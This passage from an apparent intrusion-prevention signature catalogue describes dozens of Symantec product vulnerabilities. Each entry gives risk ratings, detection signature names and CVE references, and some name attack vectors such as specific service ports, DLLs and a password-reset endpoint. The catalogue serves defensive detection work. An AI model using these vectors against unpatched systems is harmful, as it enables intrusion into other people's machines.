There is a command execution vulnerability in Symantec Alert Management System service. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted packet to the vulnerable service to execute arbitrary programs with the SYSTEM privileges.

Situation:

Generic_CS-Symantec-Alert-Management-System-HNDLRSVC-Command-Execution

References:

BID-41959
http://www.securityfocus.com/bid/41959

Symantec-Alert-Management-System-Intel-Alert-Originator-Service-Buffer-Overflow

About this vulnerability:

Symantec Alert Management System Intel Alert Originator Service Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-220-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec Alert Management System

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Symantec Alert Originator Service component shipped with Symantec Client Security software. The vulnerability is due to a boundary error in iao.exe while copying user-provided data into memory. This can be exploited by remote unauthenticated attackers to inject and execute arbitrary code on the target host. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process, which is SYSTEM on Windows platform.

Situation:

Generic_Symantec-Alert-Management-System-Alert-Originator-Service-BOF

References:

CVE-2009-1430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1430

BID-34672
http://www.securityfocus.com/bid/34672

Symantec-Alert-Management-System-Modem-String-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Symantec Antivirus Corporate Edition

Risk:

High

First detected in:

sgpkg-ips-375-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Antivirus Corporate Edition; Symantec Quarantine Server; Symantec Systems Center

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Symantec Alert Management System. The vulnerability is caused by copying a user supplied modem string into a stack buffer without prior validation of its size. The vulnerability occurs in pagehndl.dll while processing data sent from the msgsys.exe process which listens by default on TCP port 38292. A remote, unauthenticated attacker could exploit this vulnerability by sending a specially crafted packet to the affected service. Successful exploitation could result in arbitrary code execution with SYSTEM privileges.

Situation:

Generic_CS-Symantec-Alert-Management-System-Modem-String-Stack-Buffer-Overflow

References:

CVE-2010-0110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0110

BID-45936
http://www.securityfocus.com/bid/45936

Symantec-Alert-Management-System-Pin-Number-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Symantec Antivirus Corporate Edition

Risk:

High

First detected in:

sgpkg-ips-375-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Antivirus Corporate Edition; Symantec Quarantine Server; Symantec Systems Center

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Symantec Alert Management System. The vulnerability is caused by code which copies a user supplied Pin Number into a stack buffer without prior validation of its size. The vulnerable code (contained in pagehndl.dll) handles data sent from the msgsys.exe process which listens on port TCP/38292 by default. A remote unauthenticated attacker could exploit this vulnerability by sending specially crafted input to the affected service. Successful exploitation could result in arbitrary code execution in the SYSTEM context.

Situation:

Generic_CS-Symantec-Alert-Management-System-Pin-Number-Stack-Buffer-Overflow

References:

CVE-2010-0110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0110

BID-45936
http://www.securityfocus.com/bid/45936

Symantec-Altiris-Deployment-Solution-ActiveX-File-Download

About this vulnerability:

A vulnerability in Symantec Altiris Deployment Solution

Risk:

High

First detected in:

sgpkg-ips-250-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec Altiris Deployment Solution

Type:

Malfunction

Description:

There is a vulnerability in an ActiveX component distributed with Symantec Altiris Deployment Solution. The vulnerable component is Altiris eXpress NS SC Download ActiveX control (AeXNSPkgDLLib.dll). The affected control contains certain unsafe methods that can allow a remote attacker to download and execute arbitrary programs on a vulnerable system by enticing a user to visit a crafted web page. In a successful attack where arbitrary code is downloaded and executed on the vulnerable target host, the behavior of the target system depends on the malicious code.

Situation:

HTTP_SS-Symantec-Altiris-Deployment-Solution-ActiveX-File-Download
File-Text_Symantec-Altiris-Deployment-Solution-ActiveX-File-Download

References:

BID-36346
http://www.securityfocus.com/bid/36346

Symantec-Altiris-DS-SQL-Injection

About this vulnerability:

A Symantec Altiris DS SQL Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-803-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2003

Software:

Symantec Altiris Deployment Solution

Type:

SQL Injection

Description:

A vulnerability in Symantec Altiris DS, versions 6.8.x and 6.9.x before 6.9.176, that allows remote attackers to execute arbitrary SQL commands via string fields in a notification packet.

Situation:

Generic_CS-Symantec-Altiris-DS-SQL-Injection

References:

CVE-2008-2286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2286

BID-29198
http://www.securityfocus.com/bid/29198

OSVDB-45313
http://www.osvdb.org/45313

Symantec-AMS2-Arbitrary-Command-Execution

About this vulnerability:

A vulnerability in Symantec Alert Management System 2

Risk:

High

First detected in:

sgpkg-ips-288-4219

Last changed:

sgpkg-ips-1781-5242

Platform:

Windows

Software:

Symantec Alert Management System 2

Type:

Buffer Overflow

Description:

A vulnerability in Symantec Alert Management System 2 (AMS2), as used in Symantec System Center (SSS); Symantec AntiVirus Server; Symantec AntiVirus Central Quarantine Server; Symantec AntiVirus (SAV) Corporate Edition 9 before 9.0 MR7, 10.0 and 10.1 before 10.1 MR8, and 10.2 before 10.2 MR2; Symantec Client Security (SCS) 2 before 2.0 MR7 and 3 before 3.1 MR8; and Symantec Endpoint Protection (SEP) before 11.0 MR3, allows remote attackers to execute arbitrary commands. via a crafted packet sent to TCP Port 12174 to pass the packet contents as an argument to CreateProcessA(). The resulting command will be executed with SYSTEM privileges.

Situation:

Generic_Symantec-Alert-Management-System-Arbitrary-Remote-Command-Execution
Generic_Symantec-Alert-Management-System-Potential-Remote-Command-Execution

References:

CVE-2009-1429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1429

BID-34671
http://www.securityfocus.com/bid/34671

OSVDB-54157
http://www.osvdb.org/54157

Symantec-AntiVirus-Cliproxy-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Symantec Antivirus

Risk:

High

First detected in:

sgpkg-ips-288-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec Norton AntiVirus; Symantec Client Security

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in multiple Symantec products. The vulnerability is due to a lack of boundary checks in the Symantec Client Proxy ActiveX control (CLIproxy.dll). This vulnerability can allow remote attackers to execute arbitrary code on a target system by enticing a target user to open a maliciously crafted HTML document.

Situation:

HTTP_SS-Symantec-AntiVirus-Cliproxy-ActiveX-Control-Buffer-Overflow
File-Text_Symantec-AntiVirus-Cliproxy-ActiveX-Control-Buffer-Overflow

References:

CVE-2010-0108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0108

BID-38222
http://www.securityfocus.com/bid/38222

Symantec-AntiVirus-Engine-Decomposer-Mspack-Denial-Of-Service

About this vulnerability:

A vulnerability in Norton 360

Risk:

Moderate

First detected in:

sgpkg-ips-784-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Norton AntiVirus

Type:

Malfunction

Description:

Improper validation of file structures can cause a null pointer dereference, which results in a vulnerability which can be exploited to cause a denial of service condition on the target machine.

Situation:

File-Exe_Symantec-AntiVirus-Engine-Decomposer-Mspack-Denial-Of-Service

References:

CVE-2016-2211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2211

Symantec-AntiVirus-Engine-PE-Header-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Symantec Anti Virus Engine

Risk:

Moderate

First detected in:

sgpkg-ips-811-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec AntiVirus Engine

Type:

Malfunction

Description:

Incorrect handling of portable executable files in the Symantec AntiVirus Engine results in a heap buffer overflow. A successful exploitation allows an attacker to run arbitrary code on the target system.

Situation:

File-Exe_Symantec-AntiVirus-Engine-PE-Header-Heap-Buffer-Overflow

References:

CVE-2016-2208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2208

Symantec-AntiVirus-Engine-Rar-Decompression-Remote-Code-Execution

About this vulnerability:

A vulnerability in Norton Security

Risk:

Moderate

First detected in:

sgpkg-ips-842-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Norton Internet Security

Type:

Malfunction

Description:

Incorrect validation of RAR files causes a remote code execution vulnerability in Norton Security. A successful exploitation allows an attacker to run arbitrary code on the target system.

Situation:

File-Binary_Symantec-AntiVirus-Engine-Rar-Decompression-Remote-Code-Execution

References:

CVE-2016-2207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2207

Symantec-AntiVirus-Intel-Alert-Handler-Service-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in Symantec's Antivirus Intel Alert Handler service

Risk:

Moderate

First detected in:

sgpkg-ips-368-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Symantec Client Security; Symantec Antivirus Corporate Edition; Symantec System Center

Type:

Malfunction

Description:

There is a denial of service vulnerability in Symantec's Antivirus Intel Alert Handler service. By sending malicious packets to the vulnerable service, a remote attacker can cause a denial of service condition.

Situation:

Generic_CS-Symantec-AntiVirus-Intel-Alert-Handler-Service-Denial-Of-Service

References:

CVE-2010-3268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3268

BID-45368
http://www.securityfocus.com/bid/45368

OSVDB-70002
http://www.osvdb.org/70002

Symantec-AntiVirus-Real-Time-Virus-Scan-Service-Stack-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Real-Time Scan Service component of various Symantec Antivirus products

Risk:

High

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1761-5242

Platform:

Generic

Software:

Symantec Client Security; Symantec Antivirus Corporate Edition

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in the Real-Time Scan Service component of various Symantec Antivirus products. When exploited succesfully, the vulnerability allows a remote attacker to cause a denial of service or execute arbitrary code with the privileges of the vulnerable process, normally System. The W32.Sagevo worm exploits this vulnerability.

Situation:

Generic_Symantec-AntiVirus-Real-Time-Virus-Scan-Service-Stack-Overflow-Exploit

References:

CVE-2006-2630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2630

BID-18107
http://www.securityfocus.com/bid/18107

OSVDB-25846
http://www.osvdb.org/25846

Symantec-AppStream-Client-LaunchObj-ActiveX-Control-Multiple-Weaknesses

About this vulnerability:

A vulnerability in Symantec AppStream Client

Risk:

High

First detected in:

sgpkg-ips-202-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec AppStream Client

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Symantec AppStream Client. The vulnerability is due to a lack of proper checks to validate if the server to which the client connects is valid and authorized. Remote unauthenticated attackers can exploit this vulnerability by masquerading as a valid server and enticing a client to open a crafted HTML file. Successful exploitation leads to arbitrary files being downloaded and executed within the context of the client. The behavior of the target is entirely dependent on the code executed.

Situation:

HTTP_SS-Symantec-AppStream-Client-ActiveX-Control-Vulnerable-Method-Call
File-Text_Symantec-AppStream-Client-ActiveX-Control-Vulnerable-Method-Call

References:

CVE-2008-4388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4388

BID-33247
http://www.securityfocus.com/bid/33247

Symantec-AVE-Malformed-PE-Header-Memory-Access-Violation

About this vulnerability:

A vulnerability in Symantec Antivirus Engine

Risk:

Moderate

First detected in:

sgpkg-ips-775-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec AntiVirus Engine

Type:

Malfunction

Description:

A vulnerability in the Symantec AntiVirus Engine can allow a remote attacker to execute arbitrary code on the affected system.

Situation:

File-Binary_Symantec-AVE-Malformed-PE-Header-Memory-Access-Violation

References:

CVE-2016-2208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2208

BID-90653
http://www.securityfocus.com/bid/90653

Symantec-Brightmail-AntiSpam-Nested-Zip-Handling-Denial-of-Service

About this vulnerability:	A Symantec Brightmail AntiSpam Nested Zip Handling Denial of Service vulnerability
Risk:	High
First detected in:	sgpkg-ips-1009-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Symantec Brightmail AntiSpam
Type:	Malfunction
Description:	A vulnerability in Symantec Brightmail AntiSpam which allows remote attackers to cause a denial of service condition by sending a malicious zip file, due to the excessive amount of time in which the virus cleaner component takes to scan or clean messages with nested zip files.
Situation:	SMTP_CS-Symantec-Brightmail-AntiSpam-Nested-Zip-Handling-Denial-of-Service File-Zip_Symantec-Brightmail-AntiSpam-Nested-Zip-Handling-Denial-of-Service

Symantec-Discovery-XFERWAN-Service-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Symantec Discovery XFERWAN Service

Risk:

High

First detected in:

sgpkg-ips-110-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec Discovery

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Symantec Discovery XFERWAN Service. A remote unauthenticated attacker can send a crafted message with an excessively long string in the Message field to the Symantec Discovery XFERWAN Service to compromise the vulnerable system.

Situation:

Generic_Symantec-Discovery-XFERWAN-Service-Buffer-Overflow

References:

CVE-2007-1173
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1173

BID-24002
http://www.securityfocus.com/bid/24002

OSVDB-35076
http://www.osvdb.org/35076

Symantec-DNS-Compression-DoS

About this vulnerability:

A vulnerability in multiple Symantec products

Risk:

High

First detected in:

sgpkg-ips-419-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Norton Internet Security; Symantec Norton Personal Firewall; Symantec Client Firewall; Symantec Client Security; Symantec Norton AntiSpam

Type:

Input Validation

Description:

There is a denial of service vulnerability within multiple Symantec client security products. An attacker can craft a DNS packet that can cause the Symantec security products to enter an infinite loop, allowing an attacker to disable all access to the host running the vulnerable product.

Situation:

Generic_UDP-Symantec-DNS-Compression-DoS
DNS-UDP_Symantec-DNS-Compression-DoS

References:

CVE-2004-0445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0445

BID-10336
http://www.securityfocus.com/bid/10336

OSVDB-6100
http://www.osvdb.org/6100

Symantec-Encryption-Management-Server-Database-Backup-Command-Injection

About this vulnerability:

A vulnerability in Symantec Encryption Management Server

Risk:

High

First detected in:

sgpkg-ips-630-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Encryption Management Server

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Symantec Encryption Management Server. The vulnerability is due to insufficient sanitization of user supplied input when processing database backup commands from the Web UI. A remote authenticated attacker could exploit this vulnerability by sending a specially crafted request to the server web interface. Successful exploitation could lead to arbitrary command execution under the security context of the system user.

Situation:

HTTP_CRL-Symantec-Encryption-Management-Server-Database-Backup-Command-Injection

References:

CVE-2014-7288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7288

BID-72308
http://www.securityfocus.com/bid/72308

OSVDB-117766
http://www.osvdb.org/117766

Symantec-Endpoint-Protection-Consoleservlet-Resetpassword-Policy-Bypass

About this vulnerability:

A vulnerability in Symantec Endpoint Protection

Risk:

High

First detected in:

sgpkg-ips-676-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Endpoint Protection

Type:

Malfunction

Description:

An authentication bypass vulnerability exists in Symantec Endpoint Protection. This vulnerability is due to a design flaw that lets unauthenticated users to retrieve a valid session token. A remote, unauthenticated attacker may exploit this vulnerability to create an admin account and access the affected product on the target system.

Situation:

HTTP_CRL-Symantec-Endpoint-Protection-Consoleservlet-Resetpassword-Policy-Bypass

References:

CVE-2015-1486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1486

BID-76074
http://www.securityfocus.com/bid/76074

Symantec-Endpoint-Protection-Manager-Authentication-Bypass

About this vulnerability:

A Symantec Endpoint Protection Manager vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Endpoint Protection Manager

Type:

Input Validation

Description:

A vulnerability in Symantec Endpoint Protection Manager, versions 12.1 before 12.1-RU6-MP1, which allows remote attackers to obtain administrator privileges via a crafted password-reset action that triggers a new administrative session, or via writing arbitrary files with a crafted file name. This covers CVE-2015-1486, CVE-2015-1487, and CVE-2015-1489.

Situation:

HTTP_CSU-Symantec-Endpoint-Protection-Manager-Authentication-Bypass

References:

CVE-2015-1486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1486

Symantec-Endpoint-Protection-Manager-Cross-Site-Request-Forgery

About this vulnerability:

A vulnerability in Symantec Endpoint Protection

Risk:

Moderate

First detected in:

sgpkg-ips-783-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Endpoint Protection

Type:

Input Validation

Description:

Insufficient CSRF checks in Symantec Endpoint Protection result in a vulnerability that allows an attacker to appear to the server as a valid cliet.

Situation:

HTTP_CS-Symantec-Endpoint-Protection-Manager-Cross-Site-Request-Forgery

References:

CVE-2016-3653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3653

Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Symantec Endpoint Protection Manager

Risk:

Moderate

First detected in:

sgpkg-ips-617-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Symantec Endpoint Protection Manager

Type:

Input Validation

Description:

Two reflected cross-site scripting vulnerabilities have been reported in Symantec Endpoint Protection Manager. The vulnerabilities are due to insufficient validation of user input before it is sent back to the user. A remote unauthenticated attacker may exploit these vulnerabilities to execute arbitrary script code in the context of the the current browser session.

Situation:

HTTP_CRL-Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting

References:

CVE-2014-3438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3438

BID-70844
http://www.securityfocus.com/bid/70844

OSVDB-114276
http://www.osvdb.org/114276

Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting-CVE-2016-3652

About this vulnerability:

A vulnerability in Symantec Endpoint Protection

Risk:

Moderate

First detected in:

sgpkg-ips-780-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Endpoint Protection

Type:

Input Validation

Description:

Insufficient validation of HTTP requests results in a cross-site scripting vulnerability in Symantec Endpoint Protection. A successful exploit allows an attacker to execute script code in the client browser.

Situation:

HTTP_CRL-Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting-CVE-2016-3652

References:

CVE-2016-3652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3652

Symantec-Endpoint-Protection-Manager-Xml-External-Entity

About this vulnerability:

A vulnerability in Symantec Endpoint Protection Manager

Risk:

High

First detected in:

sgpkg-ips-568-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Symantec Endpoint Protection Manager

Type:

Malfunction

Description:

A XML external entity (XXE) vulnerability exists in Symantec Endpoint Protection Manager (SEPM). This is due to an incorrectly configured XML parser in the management console that readily processes XML external entities. A remote unauthenticated attacker may exploit this vulnerability via specially crafted HTTP requests containing XML to bypass security policies, perform server-side request forgery (SSRF) and cause a denial of service condition.

Situation:

HTTP_CS-Symantec-Endpoint-Protection-Manager-Xml-External-Entity

References:

CVE-2013-5014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5014

BID-65466
http://www.securityfocus.com/bid/65466

OSVDB-103305
http://www.osvdb.org/103305

Symantec-Firewall-Multiple-Vulnerabilities

About this vulnerability:

A vulnerability in Symantec Firewall

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Gateway Security

Type:

Insecure Configuration

Description:

There are multiple vulnerabilities in the Symantec Enterprise Firewall/VPN Appliance and Symantec Gateway Security products. These products contain firmware flaws which result in improper enforcement of controls relative to incoming UDP traffic. These vulnerabilities enable an attacker to view and modify the firewall rules, and additionally to create a denial of service condition. The target system will not exhibit any unusual behaviour when the vulnerability is exploited for information disclosure. If these vulnerabilities are exploited to alter the configuration of the vulnerable system, this will result in a behavior change dependent on the new configuration settings. Alternatively, in the case of the denial-of-service attack previously described, the target system will become unresponsive until restarted.

Situation:

SNMP-UDP_Symantec-Firewall-Multiple-Vulnerabilities

References:

CVE-2004-0369
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0369

BID-11039
http://www.securityfocus.com/bid/11039

Symantec-Gateway-Products-DNS-Cache-Poisoning

About this vulnerability:

A vulnerability in Symantec Gateway Security

Risk:

High

First detected in:

sgpkg-ips-604-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Gateway Security; Symantec Enterprise Firewall; Symantec VelociRaptor

Type:

Dns Spoof

Description:

There exists a vulnerability in the way the DNS proxy component of Symantec Gateway products processes and caches DNS responses. When the vulnerable component is configured to function as a DNS caching server or as a primary DNS server, it is suspectible to DNS cache poisoning under specific conditions. An attacker may exploit this vulnerability to do site spoofing, Man-in-the-Middle, or denial of service attacks by manipulating the DNS cache data on the target system.

Situation:

DNS-TCP_Symantec-Gateway-Products-DNS-Cache-Poisoning
DNS-UDP_Symantec-Gateway-Products-DNS-Cache-Poisoning

References:

CVE-2005-0817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0817

BID-12818
http://www.securityfocus.com/bid/12818

Symantec-Gateway-Products-DNSD-DNS-Cache-Spoof

About this vulnerability:

DNS cache poisoning vulnerability in Symantec Gateway products

Risk:

Moderate

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Enterprise Firewall; Symantec Gateway Security

Type:

Dns Spoof

Description:

Symantec Gateway Security product's DNS proxy (DNSd) is vulnerable to DNS cache spoofing. A remote attacker could create a malicious DNS server query response that contains authoritative or additional records resulting to the insertion of false DNS records into the DNS proxy cache.

Situation:

DNS-UDP_Symantec-Gateway-Products-DNSD-DNS-Cache-Spoof

References:

CVE-2004-1754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1754

BID-10557
http://www.securityfocus.com/bid/10557

OSVDB-7126
http://www.osvdb.org/7126

Symantec-IM-Manager-Administrator-Console-Code-Injection

About this vulnerability:	A vulnerability in Symantec IM Manager
Risk:	Moderate
First detected in:	sgpkg-ips-419-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Symantec IM Manager
Type:	Input Validation
Description:	There is a code injection vulnerability in Symantec IM Manager Administrator console. The vulnerability is due to improper input validation that can lead to Javascript code injection and execution on the server. A remote attacker can exploit this vulnerability by enticing an authenticated user to visit a crafted web page. Successful exploitation will result in inject and execution of arbitrary code in the context of the Management Console.
Situation:	HTTP_CRL-Symantec-IM-Manager-Administrator-Console-Code-Injection

Symantec-IM-Manager-Administrator-Interface-SQL-Injection

About this vulnerability:

A vulnerability in Symantec IM Manager

Risk:

Moderate

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec IM Manager

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Symantec IM Manager. The vulnerability is due to insufficient input validation in the Administrator Interface. A remote attacker can exploit this vulnerability by enticing an authenticated user to open a crafted web page. Successful exploitation will allow an attacker to execute SQL code on the underlying database of IM Manager.

Situation:

HTTP_CRL-Symantec-IM-Manager-Administrator-Interface-SQL-Injection

References:

CVE-2011-0553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0553

BID-49738
http://www.securityfocus.com/bid/49738

Symantec-IM-Manager-IMAdminReportTrendFormRun.asp-SQL-Injection

About this vulnerability:

An SQL injection vulnerability in Symantec IM Manager

Risk:

Moderate

First detected in:

sgpkg-ips-365-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec IM Manager

Type:

SQL Injection

Description:

There is an SQL injection vulnerability in Symantec IM Manager. A remote unauthenticated attacker can send a malicious HTTP request to execute SQL statements on the vulnerable server, which can result in disclosure of sensitive information, data manipulation, or command execution.

Situation:

HTTP_CRL-Symantec-IM-Manager-IMAdminReportTrendFormRun.asp-SQL-Injection

References:

CVE-2010-0112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0112

BID-44299
http://www.securityfocus.com/bid/44299

OSVDB-68900
http://www.osvdb.org/68900

Symantec-IM-Manager-IMAdminScheduleReport.asp-SQL-Injection

About this vulnerability:

An SQL injection vulnerability in Symantec IM Manager

Risk:

Moderate

First detected in:

sgpkg-ips-365-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec IM Manager

Type:

SQL Injection

Description:

Situation:

HTTP_CRL-Symantec-IM-Manager-IMAdminScheduleReport.asp-SQL-Injection

References:

CVE-2010-0112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0112

BID-44299
http://www.securityfocus.com/bid/44299

OSVDB-68898
http://www.osvdb.org/68898

Symantec-IM-Manager-LoggedInUsers.lgx-Definition-File-SQL-Injections

About this vulnerability:

An SQL injection vulnerability in Symantec IM Manager

Risk:

Moderate

First detected in:

sgpkg-ips-365-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec IM Manager

Type:

SQL Injection

Description:

Situation:

HTTP_CRL-Symantec-IM-Manager-LoggedInUsers.lgx-Definition-File-SQL-Injections

References:

CVE-2010-0112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0112

BID-44299
http://www.securityfocus.com/bid/44299

OSVDB-68901
http://www.osvdb.org/68901

Symantec-IM-Manager-Multiple-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Symantec IM Manager

Risk:

Moderate

First detected in:

sgpkg-ips-418-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec IM Manager

Type:

Input Validation

Description:

There are multiple Cross Site Scripting vulnerabilities in the Symantec IM Manager management console. The vulnerabilities are due to improperly sanitized input of URL parameters to various pages of the management console. A remote attacker can exploit these vulnerabilities by enticing a user to follow a specially crafted link to the management console. Successful exploitation results in arbitrary HTML or script code injection. The injected code runs in the browser context of the current user.

Situation:

HTTP_CSU-Symantec-IM-Manager-Multiple-Cross-Site-Scripting

References:

CVE-2011-0552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0552

BID-49739
http://www.securityfocus.com/bid/49739

OSVDB-75981
http://www.osvdb.org/75981

Symantec-IM-Manager-rdpageimlogic.aspx-SQL-Injections

About this vulnerability:

An SQL injection vulnerability in Symantec IM Manager

Risk:

Moderate

First detected in:

sgpkg-ips-366-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec IM Manager

Type:

SQL Injection

Description:

Situation:

HTTP_CRL-Symantec-IM-Manager-rdpageimlogic.aspx-SQL-Injections

References:

CVE-2010-0112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0112

BID-44299
http://www.securityfocus.com/bid/44299

OSVDB-68901
http://www.osvdb.org/68901

Symantec-IM-Manager-Web-Interface-Processaction-Code-Execution

About this vulnerability:

A vulnerability in Symantec IM Manager

Risk:

Moderate

First detected in:

sgpkg-ips-421-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec IM Manager

Type:

Input Validation

Description:

A code execution vulnerability exists in Symantec IM Manager Web Interface. The vulnerability is due to improper input validation on the rdProcess variable in rdprocess.aspx. As a result, an attacker can abuse this vulnerability to load a process configuration file from a remote network share which can lead to command execution. A remote attacker can exploit this vulnerability by sending specially crafted request to the web Interface. Successful exploitation will result in execution of arbitrary code in the context of the web server.

Situation:

HTTP_CSU-Symantec-IM-Manager-Web-Interface-Processaction-Code-Execution

References:

CVE-2011-0554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0554

BID-49742
http://www.securityfocus.com/bid/49742

Symantec-Liveupdate-Administrator-Security-Bypass

About this vulnerability:

A vulnerability in Symantec LiveUpdate Administrator

Risk:

High

First detected in:

sgpkg-ips-577-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec LiveUpdate Administrator

Type:

Malfunction

Description:

A security policy bypass vulnerability exists in Symantec LiveUpdate Administrator. The vulnerability is due to a failure to validate temporary passwords when processing a user account password reset. This can result in an arbitrary password reset. A remote unauthenticated attacker could exploit this vulnerability by sending a malicious request to forcepasswd.do, providing a LiveUpdate Administrator victim email, and a new password, effectively setting the victim user password to any arbitrary value. Successful exploitation could lead to security policy bypass and access to sensitive information.

Situation:

HTTP_CRL-Symantec-Liveupdate-Administrator-Security-Bypass

References:

CVE-2014-1644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1644

BID-66399
http://www.securityfocus.com/bid/66399

OSVDB-105090
http://www.osvdb.org/105090

Symantec-Messaging-Gateway-Directory-Traversal

About this vulnerability:

A vulnerability in Symantec Messaging Gateway

Risk:

Moderate

First detected in:

sgpkg-ips-499-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Symantec Messaging Gateway

Type:

Directory Traversal

Description:

Two directory traversal vulnerabilities exist in Symantec Messaging Gateway. The vulnerabilities are due to an input validation error when accepting user input. The vulnerability can result in information disclosure. By sending crafted requests, a remote, authenticated attacker can exploit this vulnerability to disclose sensitive information on the server.

Situation:

HTTP_CRL-Symantec-Messaging-Gateway-Directory-Traversal

References:

CVE-2012-4347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4347

BID-56789
http://www.securityfocus.com/bid/56789

